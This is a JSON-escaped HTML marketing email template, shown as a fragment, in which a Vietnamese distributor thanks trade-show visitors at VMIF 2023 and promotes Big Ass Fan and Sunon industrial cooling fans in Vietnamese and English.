style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px 30px 80px 10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\\" style=\\\"height:37px; v-text-anchor:middle; width:96px;\\\" arcsize=\\\"0%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#ffffff\\\"><w:anchorlock\\/><center style=\\\"color:#c97a14;font-family:\'Montserrat\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Montserrat\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #c97a14; background-color: #ffffff; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px;line-height:120%;\\\"><strong><span style=\\\"line-height: 16.8px;\\\">Xem th\\u00eam<br \\/><\\/span><\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #e67e23\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #e67e23;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"298\\\" style=\\\"width: 298px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 2px solid #a5a5a5;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 2px solid #a5a5a5;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_text_2\\\" style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 40px 0px 10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-family: \'Lato\',sans-serif; font-size: 14px; color: #236fa1; line-height: 140%; text-align: right; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><span style=\\\"font-family: Lato, sans-serif; line-height: 19.6px;\\\"><span style=\\\"font-size: 34px; line-height: 47.6px;\\\"><strong>HAMILTON AIR<\\/strong><\\/span><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 30px 10px 20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-size: 14px; color: #a5a5a5; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p class=\\\"p1\\\" style=\\\"line-height: 140%;\\\"><span class=\\\"s1\\\" style=\\\"line-height: 19.6px;\\\">\\u2705<\\/span> MANG \\u0110\\u1ebeN GI\\u1ea2I PH\\u00c1P QU\\u1ea0T L\\u00c0M M\\u00c1T TI\\u1ec6N NGHI V\\u00c0 TR\\u1ea2I NGHI\\u1ec6M T\\u1ed0T H\\u01a0N CHO GIA \\u0110\\u00ccNH HO\\u1eb6C DOANH NGHI\\u1ec6P<\\/p>\\r\\n<p class=\\\"p2\\\" style=\\\"line-height: 140%;\\\">\\u00a0<\\/p>\\r\\n<p class=\\\"p1\\\" style=\\\"line-height: 140%;\\\">L\\u00e0m cho kh\\u00f4ng gian c\\u1ee7a b\\u1ea1n hi\\u1ec7u qu\\u1ea3 h\\u01a1n v\\u1edbi d\\u00f2ng s\\u1ea3n ph\\u1ea9m lu\\u1ed3ng kh\\u00f4ng kh\\u00ed hi\\u1ec7u qu\\u1ea3 cao.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-size: 14px; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p class=\\\"p1\\\" style=\\\"line-height: 140%;\\\">\\u2622\\ufe0f <span style=\\\"color: #222222; white-space: normal; background-color: #ffffff; float: none; display: inline; line-height: 19.6px;\\\">First of all, Tổ chức đào tạo WIT Company would like to thank\\u00a0you for visiting our booth number 126 at VMIF Exhibition and Trademark in Binh Duong in 2023.<\\/span><\\/p>\\r\\n<div style=\\\"color: #222222; white-space: normal; background-color: #ffffff;\\\">Tổ chức đào tạo WIT Company is the exclusive distributor for 2 brands Big Ass Fan and Sunon in the Vietnam market. We specialize in providing industrial fans for Factories, Apartments, Villas and Resorts.<\\/div>\\r\\n<p style=\\\"margin: 0px; font-kerning: auto; font-feature-settings: normal; font-stretch: normal; line-height: 140%;\\\">\\u00a0<\\/p>\\r\\n<p class=\\\"p1\\\" style=\\\"line-height: 140%;\\\">\\u2622\\ufe0f Whether you have an industrial complex or a small shop, our airflow experts are here to make your life easier, more comfortable, and less expensive.<\\/p>\\r\\n<p style=\\\"margin: 0px; font-kerning: auto; font-optical-sizing: auto; font-feature-settings: normal; font-variation-settings: normal; font-stretch: normal; line-height: 140%;\\\">\\u2622\\ufe0f\\u00a0 Bring comfort and better experience for your home or business.<\\/p>\\r\\n<p style=\\\"margin: 0px; font-kerning: auto; font-optical-sizing: auto; font-feature-settings: normal; font-variation-settings: normal; font-stretch: normal; line-height: 140%;\\\">\\u00a0<\\/p>\\r\\n<p style=\\\"margin: 0px; font-kerning: auto; font-optical-sizing: auto; font-feature-settings: normal; font-variation-settings: normal; font-stretch: normal; line-height: 140%;\\\">-------o0o-------<\\/p>\\r\\n<p style=\\\"margin: 0px; font-kerning: auto; font-optical-sizing: auto; font-feature-settings: normal; font-variation-settings: normal; font-stretch: normal; line-height: 140%;\\\">\\u00a0<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\"><span style=\\\"line-height: 19.6px;\\\" class=\\\"s1\\\">\\u2705<\\/span>\\u00a0 L\\u1eddi \\u0111\\u1ea7u ti\\u00ean, C\\u00f4ng ty C\\u1ed5 Ph\\u1ea7n Tổ chức đào tạo WIT xin c\\u1ea3m \\u01a1n qu\\u00fd kh\\u00e1ch \\u0111\\u00e3 gh\\u00e9 th\\u0103m gian h\\u00e0ng s\\u1ed1 126 c\\u1ee7a ch\\u00fang t\\u00f4i t\\u1ea1i Tri\\u1ec3n l\\u00e3m v\\u00e0 Th\\u01b0\\u01a1ng hi\\u1ec7u VMIF t\\u1ea1i B\\u00ecnh D\\u01b0\\u01a1ng n\\u0103m 2023.<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\"><span style=\\\"line-height: 19.6px;\\\" class=\\\"s1\\\">\\u2705<\\/span>\\u00a0 C\\u00f4ng ty Tổ chức đào tạo WIT l\\u00e0 nh\\u00e0 ph\\u00e2n ph\\u1ed1i u\\u1ef7 quy\\u1ec1n cho 2 th\\u01b0\\u01a1ng hi\\u1ec7u qu\\u1ea1t l\\u00e0m m\\u00e1t <strong>Big Ass Fan<\\/strong> v\\u00e0 <strong>Sunon<\\/strong> t\\u1ea1i th\\u1ecb tr\\u01b0\\u1eddng Vi\\u1ec7t Nam. Ch\\u00fang t\\u00f4i chuy\\u00ean cung c\\u1ea5p c\\u00e1c lo\\u1ea1i qu\\u1ea1t c\\u00f4ng nghi\\u1ec7p cho Nh\\u00e0 m\\u00e1y, Chung c\\u01b0, Bi\\u1ec7t th\\u1ef1, Resort...<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\"><span style=\\\"color: #222222; white-space: normal; background-color: #ffffff; float: none; display: inline; line-height: 19.6px;\\\"><span style=\\\"line-height: 19.6px;\\\" class=\\\"s1\\\">\\u2705<\\/span> Cho d\\u00f9 b\\u1ea1n c\\u00f3 m\\u1ed9t khu li\\u00ean h\\u1ee3p c\\u00f4ng nghi\\u1ec7p hay m\\u1ed9t c\\u1eeda h\\u00e0ng nh\\u1ecf, c\\u00e1c chuy\\u00ean gia v\\u1ec1 lu\\u1ed3ng kh\\u00f4ng kh\\u00ed c\\u1ee7a ch\\u00fang t\\u00f4i lu\\u00f4n s\\u1eb5n s\\u00e0ng gi\\u00fap cu\\u1ed9c s\\u1ed1ng c\\u1ee7a b\\u1ea1n d\\u1ec5 d\\u00e0ng h\\u01a1n, tho\\u1ea3i m\\u00e1i h\\u01a1n v\\u00e0 \\u00edt t\\u1ed1n k\\u00e9m h\\u01a1n.<\\/span><\\/p>\\r\\n<p style=\\\"color: #222222; white-space: normal; background-color: #ffffff; margin: 0px; font-kerning: auto; font-feature-settings: normal; font-stretch: normal; line-height: 140%;\\\"><span style=\\\"line-height: 19.6px;\\\"><span style=\\\"color: #222222; white-space: normal; background-color: #ffffff; float: none; display: inline; line-height: 19.6px;\\\"><span class=\\\"s1\\\" style=\\\"line-height: 19.6px;\\\">\\u2705<\\/span> <\\/span>Mang l\\u1ea1i s\\u1ef1 tho\\u1ea3i m\\u00e1i v\\u00e0 tr\\u1ea3i nghi\\u1ec7m t\\u1ed1t h\\u01a1n cho ng\\u00f4i nh\\u00e0 ho\\u1eb7c doanh nghi\\u1ec7p c\\u1ee7a b\\u1ea1n.<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1688180196473-sunon_1.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1688180218600-vimf-2023.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1688181250240-contact.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #cc7202;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #cc7202;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-size: 14px; color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">Kh\\u00f4ng c\\u00f3 nh\\u00e0 s\\u1ea3n xu\\u1ea5t qu\\u1ea1t n\\u00e0o n\\u1ed7 l\\u1ef1c t\\u1ea1o ra c\\u00e1c s\\u1ea3n ph\\u1ea9m ti\\u1ebft ki\\u1ec7m n\\u0103ng l\\u01b0\\u1ee3ng h\\u01a1n Qu\\u1ea1t Big Ass. \\u0110\\u00f3 l\\u00e0 l\\u00fd do t\\u1ea1i sao c\\u00e1c doanh nghi\\u1ec7p tr\\u00ean to\\u00e0n th\\u1ebf gi\\u1edbi s\\u1eed d\\u1ee5ng qu\\u1ea1t c\\u1ee7a ch\\u00fang t\\u00f4i \\u0111\\u1ec3 c\\u1eaft gi\\u1ea3m t\\u1edbi 30% chi ph\\u00ed l\\u00e0m m\\u00e1t v\\u00e0 t\\u1ea1i sao c\\u00e1c nh\\u00e0 thi\\u1ebft k\\u1ebf d\\u1ef1a v\\u00e0o c\\u00e1c 